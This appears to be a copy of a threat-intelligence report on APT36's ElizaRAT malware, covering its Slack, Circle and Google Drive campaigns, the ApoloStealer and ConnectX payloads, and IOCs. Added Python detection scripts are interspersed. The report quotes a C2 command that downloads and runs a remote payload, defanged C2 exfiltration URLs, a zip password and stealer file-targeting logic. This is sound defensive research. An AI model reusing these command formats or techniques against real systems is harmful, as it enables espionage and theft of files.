CLOUDY WITH A CHANCE OF RATS: UNVEILING APT36 AND THE EVOLUTION OF ELIZARAT

November 4, 2024
https://research.checkpoint.com/2024/the-evolution-of-transparent-tribes-new-malware/



INTRODUCTION

APT36, also known as Transparent Tribe, is a Pakistan-based threat actor
notorious for persistently targeting Indian government organizations, diplomatic
personnel, and military facilities. APT36 has conducted numerous cyber-espionage
campaigns against Windows, Linux, and Android systems.

In recent campaigns, APT36 utilized a particularly insidious Windows RAT known
as ElizaRAT. First discovered in 2023, ElizaRAT has significantly evolved to
enhance its evasion techniques and maintain reliability in its command and
control (C2) communication.

This report focuses on ElizaRAT’s evolution. We examine the various payloads and
infrastructures employed by APT36 and the malware’s inner workings, including
deployment methods, second-stage payloads, and the persistent use of cloud
infrastructure.


KEY FINDINGS

 * Check Point Research is closely tracking the persistent use of ElizaRAT, a
   custom implant deployed by Transparent Tribe (aka APT36) in targeted attacks
   on high-profile entities in India. We observed multiple, likely successful,
   campaigns of Transparent Tribe in India in 2024.
 * Our analysis of recent campaigns reveals continuous enhancements in the
   malware’s evasion techniques, along with introducing a new stealer payload
   called “ApoloStealer.”
 * ElizaRAT samples indicate a systematic abuse of cloud-based services,
   including Telegram, Google Drive, and Slack, to facilitate command and
   control communications.


ELIZARAT – BACKGROUND AND EVOLUTION

First publicly disclosed in September 2023, ElizaRAT is a Windows Remote Access
Tool (RAT) utilized by Transparent Tribe in targeted attacks. ElizaRAT
infections are often initiated by CPL files distributed through Google Storage
links, likely distributed by phishing. ElizaRAT used Telegram channels in its
earlier variants to facilitate Command and Control (C2) communication.

Since its discovery, ElizaRAT’s execution methods, detection evasion, and C2
communication have all evolved. This was apparent in three distinct campaigns
that utilized the malware at the end of 2023 and the beginning of 2024. In each
campaign, the attacker used a different variant of ElizaRAT to download specific
second-stage payloads that automatically collect information.

The main characteristics of ElizaRAT include:

 * Written in .NET, using Costura to embed .NET and assembly modules.
 * Execution through Control Panel (.CPL) files
 * Use of cloud services such as Google, Telegram, and Slack for distribution
   and C2 communication
 * Drops lure documents or videos as decoys
 * In most samples, uses IWSHshell to create a Windows shortcut to the malware
 * In most samples, uses SQLite as a resource to store files from the victim’s
   machine in a local database before exfiltration
 * Generates and stores a unique victim ID in a separate file on the machine.

Figure 1 – Campaign timeline, according to the malware compilation timestamps


SLACK CAMPAIGN


SLACKAPI.DLL – ELIZARAT

SlackAPI.dll (MD5: 2b1101f9078646482eb1ae497d44104) is an ElizaRAT variant that
leverages Slack channels as C2 infrastructure. It was compiled at the end of
2023 and is executed as a CPL file. CPL files are directly invoked by a double
click, making spear phishing a convenient infection route.

This variant most closely resembles the original Textsource variants of ElizaRAT
in terms of asynchronous code, functionality, and execution. It follows all the
ElizaRAT characteristics and base creation functionality:

 * Generates user info file: Creates the Userinfo.dll file within the working
   directory and stores the victim ID in it in the following
   format: <username>-<machinename>-<random between 200 to 600>.
 * Creates the working directory: Establishes a new directory
   at %appdata%\SlackAPI.
 * Logging: Logs its actions to a text file (logs.txt) in
   the %appdata%\SlackAPI directory.
 * Time zone check: Checks if the local time zone is India Standard Time.
 * Decoys: Drops a decoy mp4 file.

To register the victims in the attacker C2, the malware reads the content
of Userinfo.dll and sends it to the C2 server. The malware then continuously
checks the C2 for new commands every 60 seconds.

It consists of three classes of code:

 * CplAppletDelegate – Includes the MAIN function and the fundamental execution
   processes.
 * Communication – Responsible for the C2 communication.
 * Controls – Contains functions for each command that the malware can receive
   from the C2.

The content received from the C2 is processed by the FormatMsgs function, which
knows how to parse the content and run the related function from
the Controls according to the command received from the C2.

The following are the commands the malware can process:

| Command | Description | Function |
| --- | --- | --- |
| files | Downloads a file specified in the C2 message and acknowledges the download to the C2. | Controls.DownloadFile |
| screenshot | Captures a screenshot of the infected system’s desktop and uploads it to the C2. | Controls.screenshot |
| online | Sends the current user information (stored in Userinfo.dll) to the C2 to confirm that the system is online. | Controls.online |
| dir | Sends a directory listing of a specified path on the victim’s machine to the C2. | Controls.DirectoryInfo |
| upload | Uploads a specified file from the victim’s machine to the C2. | Controls.Uploadfile |
| RunFile | Executes a specified file stored in the working directory. | Controls.RunFile |
| exit | Terminates the malware execution on the victim’s machine. | Environment.Exit(0) |
| info | Collects and sends detailed system information, including OS version and installed antivirus software. | Controls.Information |

The C2 communication in SlackAPI.dll is managed through the Communication class,
which uses Slack’s API to interact with the attacker.
The ReceiveMsgsInList() function continuously polls the channel C06BM9XTVAS via
the Slack API
at https://slack[.]com/api/conversations.history?channel=C06BM9XTVAS&count=1&limit=1,
using the bot token and the victim ID content in the request. This function runs
in an endless loop, checking for new commands every 60 seconds.

For message and file handling, the SendMsg() function sends messages to the C2
by posting to https://slack.com/api/chat.postMessage with the content and
channel ID C06BWCMSF1S, while SendFile() uploads files to the same channel
using https://slack.com/api/files.upload. The DownloadFile() function retrieves
files from a provided URL, saving them to the victim’s machine
using HttpClient and the bot token for secure access.
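
A detection sketch for the polling behaviour described above, added here as an example and not taken from the report: it flags hosts where a process outside an assumed allowlist calls conversations.history at a steady 60-second cadence, or where a request names one of the reported channel IDs. The log format, host names, process names and allowlist are constructed assumptions, and the URL query is only visible where a TLS-inspecting proxy or EDR records it.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import median
from urllib.parse import parse_qs, urlsplit

# Channel IDs this page reports for the SlackAPI.dll variant.
REPORTED_CHANNELS = {"C06BM9XTVAS", "C06BWCMSF1S"}
POLL_PATH = "/api/conversations.history"
# Assumed allowlist of processes expected to call the Slack API; tune per estate.
EXPECTED_PROCESSES = {"slack.exe", "chrome.exe", "msedge.exe", "firefox.exe"}

# Constructed log format: "<ISO-8601 time> <host> <process> <method> <url>"
LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (GET|POST) (\S+)$")

# Constructed sample log (hosts, times and the C0000... channel IDs are invented).
SAMPLE_LOG = """\
2024-01-15T09:00:00 WS-041 rundll32.exe GET https://slack.com/api/conversations.history?channel=C06BM9XTVAS&count=1&limit=1
2024-01-15T09:01:01 WS-041 rundll32.exe GET https://slack.com/api/conversations.history?channel=C06BM9XTVAS&count=1&limit=1
2024-01-15T09:02:00 WS-041 rundll32.exe GET https://slack.com/api/conversations.history?channel=C06BM9XTVAS&count=1&limit=1
2024-01-15T09:03:02 WS-041 rundll32.exe GET https://slack.com/api/conversations.history?channel=C06BM9XTVAS&count=1&limit=1
2024-01-15T09:04:01 WS-041 rundll32.exe GET https://slack.com/api/conversations.history?channel=C06BM9XTVAS&count=1&limit=1
2024-01-15T09:00:09 WS-041 rundll32.exe GET https://example.org/index.html
2024-01-15T09:00:05 WS-007 slack.exe GET https://slack.com/api/conversations.history?channel=C0000000000&limit=100
2024-01-15T09:00:07 WS-007 slack.exe GET https://slack.com/api/conversations.history?channel=C0000000000&limit=100
2024-01-15T09:02:40 WS-007 slack.exe GET https://slack.com/api/conversations.history?channel=C0000000000&limit=100
2024-01-15T09:03:10 WS-007 slack.exe GET https://slack.com/api/conversations.history?channel=C0000000000&limit=100
2024-01-15T09:00:00 WS-013 python.exe GET https://slack.com/api/conversations.history?channel=C0000000001&limit=50
2024-01-15T09:10:00 WS-013 python.exe GET https://slack.com/api/conversations.history?channel=C0000000001&limit=50
2024-01-15T09:30:00 WS-013 python.exe GET https://slack.com/api/conversations.history?channel=C0000000001&limit=50
2024-01-15T09:31:00 WS-013 python.exe GET https://slack.com/api/conversations.history?channel=C0000000001&limit=50
this line is malformed and must be skipped
""".splitlines()


def parse_line(line):
    """Parse one log line; return None for malformed or non-Slack entries."""
    match = LINE_RE.match(line.strip())
    if not match:
        return None
    stamp, host, process, _method, url = match.groups()
    parts = urlsplit(url)
    if parts.hostname != "slack.com":
        return None
    channel = parse_qs(parts.query).get("channel", [None])[0]
    return {
        "ts": datetime.fromisoformat(stamp),
        "host": host,
        "proc": process.lower(),
        "path": parts.path,
        "channel": channel,
    }


def find_suspects(lines, period=60, tolerance=5, min_polls=4):
    """Return {(host, process): [reasons]} for Slack API use worth triaging."""
    polls = defaultdict(list)
    findings = defaultdict(set)
    for line in lines:
        event = parse_line(line)
        if event is None:
            continue
        key = (event["host"], event["proc"])
        # Indicator match: a channel ID published in the report.
        if event["channel"] in REPORTED_CHANNELS:
            findings[key].add("reported-channel-id")
        # Behavioural match: history polling by a process that is not a Slack client.
        if event["path"] == POLL_PATH and event["proc"] not in EXPECTED_PROCESSES:
            polls[key].append(event["ts"])
    for key, stamps in polls.items():
        if len(stamps) < min_polls:
            continue  # too few samples to call it a cadence
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        # The median tolerates a missed or delayed poll better than the mean.
        if abs(median(gaps) - period) <= tolerance:
            findings[key].add("fixed-interval-poll")
    return {key: sorted(reasons) for key, reasons in findings.items()}


if __name__ == "__main__":
    for (host, proc), reasons in find_suspects(SAMPLE_LOG).items():
        print(host, proc, ", ".join(reasons))
```

The cadence rule still fires if the channel IDs are rotated, which is why the two checks are reported separately.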


APOLOSTEALER (SLACKFILES.DLL)

The threat actor deployed an additional payload, which we named ApoloStealer, on
specific targets. According to the compilation time, the variant of ApoloStealer
used in this campaign was compiled one month after the ElizaRAT SlackAPI.dll
variant, which might suggest that additional payloads are involved.

ApoloStealer employs techniques similar to other Transparent Tribe malware:

 * Checks whether the local time zone is India Standard Time.
 * The working directory is the same as SlackAPI.dll – %appdata%\SlackAPI.
 * Includes SQLite.Interop.dll as a resource and two other mp4 files used as
   decoys.
 * Creates a user info file with the name appid.dll and stores the victim ID in
   a similar manner: <username>-<machinename>-<random between 500-1000>.
 * Registers the victim at the attacker C2, http://83.171.248[.]67/suitboot.php,
   and waits for a response.
 * Creates an LNK shortcut via IWSHELL to run the file using rundll.
 * Logs all its actions in a local log file created in the working
   directory, %appdata%\SlackAPI\rlogs.txt.

After creating the database file, ApoloStealer creates a table to store data in
these fields: filename, file path, flag, type, and modified date. The malware
then collects all DESKTOP files that do not start with ~ or ! and have one of
the following extensions:

.ppt, .pptx, .pptm, .potx, .potm, .pot, .ppsx, .ppsm, .odp, .doc, .docm, .docx,
.dot, .dotm, .dotx, .odt, .rtf, .pdf, .xls, .xlsx, .csv, .txt, .zip, .rar, .png,
.jpg, .tar, .jpeg, .raw, .svg, .dwg, .heif, .heic, .psd

After storing all the relevant files in the database file, ApoloStealer sends
the data to the C2 server at the URL http://83.171.248[.]67/oneten.php.

The malware repeats the same process for the Downloads directory, OneDrive
directory, and each fixed drive on the machine, except for C:\.
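
The on-disk artifacts listed for SlackAPI.dll and ApoloStealer lend themselves to a host sweep. The following added example (not code from the report) looks in one user's %appdata% for the SlackAPI working directory, counts Userinfo.dll and appid.dll as hits only when they are plain-text victim-ID markers rather than PE images, and notes the log files. The function names and the sample tree are constructed, and the ID ranges are treated as inclusive, which is an assumption.

```python
import tempfile
from pathlib import Path

# Working directory and file names as reported on this page for the Slack campaign.
WORKDIR_NAME = "slackapi"
# Marker file -> range of the trailing random number in the victim ID
# (bounds treated as inclusive: an assumption, the page only says "between").
ID_FILES = {"userinfo.dll": (200, 600), "appid.dll": (500, 1000)}
LOG_FILES = {"logs.txt", "rlogs.txt"}


def read_victim_id(path, low, high):
    """Return the victim ID if the file is a text marker in range, else None."""
    data = path.read_bytes()[:512]
    if data[:2] == b"MZ":
        return None  # a genuine PE image, not the plain-text marker described above
    try:
        text = data.decode("utf-8-sig").strip()
    except UnicodeDecodeError:
        return None
    if "\n" in text:
        return None
    # Machine names such as DESKTOP-7F3K2Q contain hyphens, so only the last
    # field splits off reliably; "<username>-<machinename>" stays joined.
    prefix, sep, number = text.rpartition("-")
    if not sep or "-" not in prefix or not number.isdigit():
        return None
    if not low <= int(number) <= high:
        return None
    return text


def triage_appdata(appdata):
    """Return (kind, file name, detail) findings for one user's %appdata%."""
    findings = []
    for child in Path(appdata).iterdir():
        # Windows paths are case-insensitive, so compare lowercased names.
        if not (child.is_dir() and child.name.lower() == WORKDIR_NAME):
            continue
        for entry in sorted(child.iterdir(), key=lambda p: p.name.lower()):
            name = entry.name.lower()
            if not entry.is_file():
                continue
            if name in ID_FILES:
                victim_id = read_victim_id(entry, *ID_FILES[name])
                if victim_id:
                    findings.append(("victim-id-marker", entry.name, victim_id))
            elif name in LOG_FILES:
                findings.append(("activity-log", entry.name, entry.stat().st_size))
    return findings


def build_sample(root):
    """Create a constructed %appdata% tree (every value here is invented)."""
    work = Path(root) / "SlackAPI"
    work.mkdir(parents=True)
    (work / "Userinfo.dll").write_bytes(b"asharma-DESKTOP-7F3K2Q-412")
    (work / "appid.dll").write_bytes(b"asharma-DESKTOP-7F3K2Q-731")
    (work / "rlogs.txt").write_bytes(b"constructed log line\n")
    # A real library sitting in the same folder must not be reported as a marker.
    (work / "SQLite.Interop.dll").write_bytes(b"MZ\x90\x00" + b"\x00" * 60)
    return root


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for finding in triage_appdata(build_sample(tmp)):
            print(finding)
```

On a live system the function would be called once per user profile, with the path taken from each profile's roaming AppData folder.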


CIRCLE CAMPAIGN

Compiled in January 2024, the Circle ElizaRAT variant is an improved version of
the malware. It utilizes an additional dropper component, which results in much
lower detection rates. The Circle campaign uses a payload that resembles the
SlackFiles payload and uses a similar working directory (%appdata%\SlackAPI).

Unlike other ElizaRAT variants, the Circle campaign does not use any cloud
service as C2 infrastructure and instead uses a simple virtual private server
(VPS) for C2 communication.

Figure 3 – Circle Infection Chain.


CIRCLE DROPPER

The sole purpose of the dropper is to set up the necessities for the execution
of ElizaRAT. The function BringCircle drops and unpacks a zip file embedded as a
resource containing the ElizaRAT malware. It also creates the working
directory %appdata%\CircleCpl and drops the decoy PDF document and MP4 file.
The dropper also creates an LNK file for the malware, a known characteristic of
ElizaRAT, but there is no indication that any of the malware uses it. Note that
the description of the LNK is Slack API File, which also ties this cluster to
the Slack campaign.

Figure 4 – Use of WshShell to create the LNK file.

After dropping the malware, the dropper executes it with a
simple Process.start() function.


CIRCLE – ELIZARAT

This is the ElizaRAT variant utilized in the Circle campaign cluster. It
performs the same checks and base creation as all other variants:

 * Checks if the time zone is set to India Standard Time.
 * Registers the victim’s information in a DLL file located in the working
   directory %appdata%\CircleCpl, which is created by the dropper. It then sends
   its content to the attacker C2 at the
   URL http://38.54.84[.]83/MiddleWare/NewClient.
 * Victim registration occurs in two files:
   * Applicationid.dll: Stores a victim ID combining a random number (100-1000),
     the username, and the machine name (<random
     100-1000>-<username>-<machinename>), similar to other ElizaRAT variants.
   * Applicationinfo.dll: Stores detailed victim information in the
     format {machinename}>{username}>{IP}>{OS}>{machinetype}.
 * Retrieves the victim’s IP address by accessing the
   URL https://check.torproject.org/api/ip, most likely to identify the victim’s
   outbound IP address.

To get a new task from the attacker, the malware sends the content of
the applicationid.dll, with the addition of x002> at the start of the string, to
the URL http://38.54.84[.]83/MiddleWare/GetTask and waits for the response.

There are three tasks the malware can receive from the attacker:

 * at>{URI} – In this case, the malware triggers the DownloadFile() function,
   which will download the file from the URL http://38.54.84[.]83/uploads/{URI}.
 * in>{URL} – The malware triggers the DownloadFile() function, which will
   download a file from the given URL.
 * NA>NA – The malware sleeps for 2 minutes and then triggers
   the Awake() function again.

Figure 5 – An HTTP stream example of the malware’s communication.
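
An added example (not part of the original report) for incident responders: it decodes NewClient and GetTask bodies that have already been extracted from a packet capture or proxy log into a timeline of registrations and issued tasks, so the download URLs can be followed up. How the bodies are carried inside the HTTP request is not stated on the page, so the input tuples, function names and sample values are constructed assumptions.

```python
import re

# Values reported on this page for the Circle variant (C2 address kept defanged).
C2_UPLOADS = "http://38.54.84[.]83/uploads/"
TASK_PREFIX = "x002>"
INFO_FIELDS = ("machinename", "username", "ip", "os", "machinetype")
# <random 100-1000>-<username>-<machinename>; user and machine may contain hyphens.
VICTIM_ID_RE = re.compile(r"^(\d{3,4})-(.+-.+)$")

# Constructed exchanges: (endpoint, request body, response body).
SAMPLE_EXCHANGES = [
    ("/MiddleWare/NewClient",
     "DESKTOP-7F3K2Q>asharma>203.0.113.25>Microsoft Windows 10 Pro>x64", ""),
    ("/MiddleWare/GetTask", "x002>412-asharma-DESKTOP-7F3K2Q", "NA>NA"),
    ("/MiddleWare/GetTask", "x002>412-asharma-DESKTOP-7F3K2Q", "at>bundle.zip"),
    ("/MiddleWare/GetTask", "x002>412-asharma-DESKTOP-7F3K2Q",
     "in>http://files.example.net/pkg.zip"),
    ("/MiddleWare/GetTask", "x002>garbage", "unexpected"),
]


def defang(url):
    """Bracket the dots in the host part so the URL is safe to paste in a report."""
    scheme, sep, rest = url.partition("://")
    host, slash, path = rest.partition("/")
    return f"{scheme}{sep}{host.replace('.', '[.]')}{slash}{path}"


def parse_task_request(body):
    """Return the victim ID from an 'x002>'-prefixed GetTask body, else None."""
    body = body.strip()
    if not body.startswith(TASK_PREFIX):
        return None
    victim_id = body[len(TASK_PREFIX):]
    match = VICTIM_ID_RE.match(victim_id)
    if not match or not 100 <= int(match.group(1)) <= 1000:
        return None
    return victim_id


def parse_client_info(body):
    """Split the {machinename}>{username}>{IP}>{OS}>{machinetype} record."""
    fields = body.strip().split(">")
    if len(fields) != len(INFO_FIELDS) or not all(fields):
        return None
    return dict(zip(INFO_FIELDS, fields))


def parse_task_response(body):
    """Classify a GetTask response into the three tasks the page lists."""
    kind, sep, arg = body.strip().partition(">")
    if sep and kind == "NA" and arg == "NA":
        return {"task": "sleep", "seconds": 120, "url": None}
    if sep and kind == "at" and arg:
        # at>{URI}: file fetched from the C2's own uploads path.
        return {"task": "download", "url": C2_UPLOADS + arg}
    if sep and kind == "in" and arg:
        # in>{URL}: file fetched from an arbitrary URL chosen by the operator.
        return {"task": "download", "url": defang(arg)}
    return {"task": "unknown", "url": None}


def build_timeline(exchanges):
    """Return (event, victim, url) tuples in capture order."""
    timeline = []
    for endpoint, request_body, response_body in exchanges:
        name = endpoint.rstrip("/").rsplit("/", 1)[-1]
        if name == "NewClient":
            info = parse_client_info(request_body)
            timeline.append(("register", info["machinename"] if info else None, None))
        elif name == "GetTask":
            task = parse_task_response(response_body)
            victim = parse_task_request(request_body)
            timeline.append((task["task"], victim, task["url"]))
    return timeline


if __name__ == "__main__":
    for row in build_timeline(SAMPLE_EXCHANGES):
        print(row)
```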

If the malware triggers the DownloadFile() function, it will also trigger
the ExtractFile() function, designed to unpack a zip file.

Figure 6 – ExtractFile() function.

The zip file contains the SQLite DLL, which will be used in the second-stage
payload. It is extracted to %appdata%\SlackAPI, the same working directory as
the Slack campaign. If we examine the RunFile() function, we can see it is
designated to execute the SlackFiles.dll stealer.

Figure 7 – RunFile() function. The sfdll variable is equal to SlackFiles.dll.

The fact that this malware is designated to download the SlackFiles.dll payload
and use the same working directory as the Slack campaign suggests that these two
activity clusters are part of the same campaign.


GOOGLE DRIVE CAMPAIGN

The initial infection vector used in this campaign is not clear. However, based
on the file names, such as “Amended Copy.cpl” and “Threat Alert 1307-JS-9.pdf
issued vide NATRAD note number 2511 CLKj dated 10 Aug 2024 in aspect of exercise
Tarang Shakti-2024.pdf.cpl”, as well as past campaigns by the threat actor, they
were likely sent via spear phishing.

Figure 8 – Google Drive-based Campaign Infection Chain.

Much like previous versions, the CPL file is a dropper responsible for setting
up all the necessities for the next stage, including:

 * Create the working directory ApplicationData\BaseFilteringEngine
 * Register the victim
 * Establish persistence through a scheduled task
 * Drop ElizaRAT files, including the decoy PDF, an X.509 certificate, and the
   main ElizaRAT variant (BaseFilterEngine.dll)


COMMAND AND CONTROL

The ElizaRAT variant used in this campaign leverages Google Cloud for its C2
communication. Utilizing the Google C2 channel, the actor sends commands to
download the next stage payload from different virtual private servers (VPS). In
this campaign, we observed the use of three different VPS.

The main ElizaRAT malware (baseFilteringEngine.dll) uses the X.509 certificate
to create a ServiceAccountCredential object for authenticating a Google Cloud
Storage service account: xijinping@round-catfish-416409.iam.gserviceaccount.com.
The email associated with this service account is fikumatry@gmail.com. The
malware checks for the parent folder 1Gwy3yPyyYJVoOvCMfsmhhCknC-tiuNFv and lists
all the files in that folder. Next, it locates the related victim’s tmp1 file,
gets the commands and logs its actions.

The only command the malware can process is the Transfer command, which directs
the malware to download a payload from a specific VPS address. Below is a sample
format of the command the malware received for the chosen victims:

Transfer:!http://84.247.135[.]235:8080/phenomenon/SpotifyAB.zip:!rundll32.exe:!SpotifyAB.dll:!SpotifyAB.zip:!Mean:!Doj!@g8H6fb:!SpotifyAB

The malware splits the command at :! into an array, where each element
represents a specific parameter of the operation:

 * array[0] – The operation to execute: “Transfer”
 * array[1] – Download URL.
 * array[2] – Process to execute the file (parent).
 * array[3] – File name.
 * array[4] – File name.
 * array[5] – Function to execute.
 * array[6] – Zip password.
 * array[7] – Name of the folder to create and store.

When processing the command, the following sequence is triggered:

 1. A folder is created as specified.
 2. The function DownloadProtection downloads a file using
    an HttpWebRequest from a specified URL to the file with the specified name
    in the working folder.
 3. The function Withdraw extracts the received file using the provided
    password.
 4. The function BetaDrum creates a scheduled task that runs the file with the
    provided parent every 5 minutes.
 5. A message is sent to the server indicating the successful operation.
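A parser for the Transfer command format above, as an incident responder might use it to turn a captured command into network indicators and host hunt terms. This is an added example, not code from the report or the malware: the function and field names are hypothetical, and the input is the sample command as printed in the report.

```python
import re
from typing import NamedTuple, Optional

FIELD_SEP = ":!"  # separator the report says the malware splits on
URL_RE = re.compile(r"(?:https?|hxxps?)://([^/:]+)(?::(\d+))?(/.*)?$")

# The sample command exactly as printed in the report (host already defanged).
SAMPLE = ("Transfer:!http://84.247.135[.]235:8080/phenomenon/SpotifyAB.zip"
          ":!rundll32.exe:!SpotifyAB.dll:!SpotifyAB.zip:!Mean:!Doj!@g8H6fb:!SpotifyAB")


class TransferCommand(NamedTuple):
    operation: str      # array[0]
    download_url: str   # array[1]
    parent: str         # array[2], process used to execute the file
    file_name: str      # array[3], "File name" (a .dll in the sample)
    file_name_2: str    # array[4], "File name" (a .zip in the sample)
    function: str       # array[5]
    zip_password: str   # array[6]
    folder: str         # array[7]


def parse_transfer(raw: str) -> Optional[TransferCommand]:
    """Split on ':!' and accept only a well-formed, 8-field Transfer command.
    A truncated capture, or a field that itself contains ':!', yields a
    different field count and is rejected rather than guessed at."""
    fields = raw.strip().split(FIELD_SEP)
    if len(fields) != 8 or fields[0] != "Transfer" or not all(fields):
        return None
    return TransferCommand(*fields)


def triage(cmd: TransferCommand) -> dict:
    """Turn a parsed command into network indicators and host hunt terms."""
    m = URL_RE.match(cmd.download_url)
    host, port, path = m.groups() if m else (None, None, None)
    return {
        "network": {"host": host, "port": int(port) if port else None, "path": path},
        # Values to look for in scheduled-task definitions and process telemetry.
        "host": {"process": cmd.parent, "module": cmd.file_name,
                 "export": cmd.function, "folder": cmd.folder,
                 "archive": cmd.file_name_2},
        "task_interval_minutes": 5,  # BetaDrum's schedule, per the report
    }


if __name__ == "__main__":
    cmd = parse_transfer(SAMPLE)
    print(cmd)
    print(triage(cmd))
```
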


PAYLOADS – GOOGLE DRIVE CAMPAIGN

So far, we’ve seen two payloads utilized in this
campaign: extensionhelper_64.dll and ConnectX.dll. Both payloads function as
info stealers, each designed for a specific purpose. Despite these minor
changes, the payloads’ core functionality and primary purpose remained
consistent throughout the campaign.


APOLOSTEALER (STEALER EXTENSIONHELPER_64)

The extensionhelper_64.dll file is downloaded to the victim’s machine
as SpotifyAB.dll or Spotify-news.dll and is executed by the scheduled task,
which runs the Mean function via rundll32.exe. This payload is a file stealer
that collects specific file types, stores their metadata in a database, and
exfiltrates it to the C2 server.

First, the malware creates an SQLite database file, which it interacts with
using the DBmanager class and the SQLite.Interop.dll. The SQLite DLL is embedded
in the malware in a protected zip file, which the malware extracts using a
plain text password.

While iterating over all files on the fixed drives, the malware skips
directories such as Program Files, Windows, ProgramData, and AppData to avoid
processing system directories. It also filters out files that start with $, .,
or ~, which are typically system or temporary files. The malware is only
interested in these file suffixes:

.xla .xlam .xll .xlm .xlsm .xlt .xltm .xltx .dif .xls .xlsx .ppt .pptx .pot
.potm .potx .ppam .pps .ppsm .ppsx .pptm .pub .rtf .sldm .sldx .pdf .jpg .png
.jpeg .odf .odg .zip .csv .xlc .rar .tar

The malware stores the name, path, and another parameter called isUploaded for
each relevant file. isUploaded is a boolean variable indicating whether the file
was uploaded to the C2. If a file wasn’t uploaded to the C2, the malware calls
the sendRequest function, which reads the file’s byte content and sends it to
the C2 while updating its upload status.

Like the other malware in this campaign, it also hides some of its operations in
a text blob, which it splits by ‘ ‘ (space). The information it tries to hide
includes its C2 server and the different web pages it communicates with, even
though they are not eventually used:

Figure 9 – The text blob used to hide some strings in the payload, split by
space.


CONNECTX – USB STEALER

An additional payload is designed to examine files on external drives, such as
USBs. This malware utilizes WMI (Windows Management Instrumentation) to list all
relevant files on external drives and targets the same file extensions. However,
instead of storing them in a database, it stores them in an archive it creates
in the BaseFilteringEngine working directory.

The malware uses WMI to monitor the creation of new disk drives every two
seconds, most likely to detect the insertion of a USB drive:

SELECT * FROM __InstanceCreationEvent WITHIN 2 WHERE TargetInstance ISA
'Win32_DiskDrive'

For each device, it retrieves the device ID and serial number and checks for the
correct disk partition to iterate on. Unlike other ElizaRAT-associated stealers,
ConnectX doesn’t have a C2 server to exfiltrate the data to; it just stores the
data in a zip file in the ElizaRAT working directory
%appdata%\BaseFilteringEngine.


ATTRIBUTION

ElizaRAT is a custom tool known to be employed exclusively by “Transparent
Tribe” against targets similar to those described in this report. This is in
addition to other indicators linked to the group’s campaigns, including using an
overlapping email account in a different activity cluster
targeting Linux systems.

Like other malware associated with Transparent Tribe, all the samples presented
here used the name Apolo Jones. In the Google Drive campaign, the decoy PDF file
attributes its authorship to Apolo Jones, a distinctive name previously observed
in various aspects of Transparent Tribe’s operations.

Figure 10 – ElizaRAT lure PDF Metadata.

The use of Apolo Jones occurs differently in the campaigns. For example, in the
Circle dropper, the password ApoloJones2024 is used to uncompress the zip file.
In addition, the function responsible for checking the time zone in
the SlackFiles.dll payload is also named ApoloJones.


VICTIMOLOGY

The internal checks the ElizaRAT variants perform suggest the campaigns
exclusively targeted Indian systems, evidenced by each malware variant’s initial
function of verifying whether the system’s time zone was set to “India Standard
Time”.

Figure 11 – An example of the time zone check in the SlackFiles.dll payload.
This function occurs in all samples.


CONCLUSION

The progression of ElizaRAT reflects APT36’s deliberate efforts to enhance their
malware to better evade detection and effectively target Indian entities. By
integrating cloud services like Google Drive, Telegram, and Slack into their
command and control infrastructure, they exploit commonly used platforms to mask
their activities within regular network traffic.

Introducing new payloads such as ApoloStealer marks a significant expansion of
APT36’s malware arsenal and suggests the group is adopting a more flexible,
modular approach to payload deployment. These methods primarily focus on data
collection and exfiltration, underscoring their sustained emphasis on
intelligence gathering and espionage.


PROTECTION

Harmony Endpoint

 * APT.Win.ElizaRAT.B/C/D

Threat Emulation

 * RAT.Wins.Eliza.ta.A/B/C/D


IOCS



NETWORK

Type  Value               Description
IP    84.247.135[.]235    C2 server – Google Drive campaign
IP    143.110.179[.]176   C2 server – Google Drive campaign
IP    64.227.134[.]248    C2 server – Google Drive campaign
IP    38.54.84[.]83       C2 server – Circle campaign
IP    83.171.248[.]67     C2 server – Slack campaign

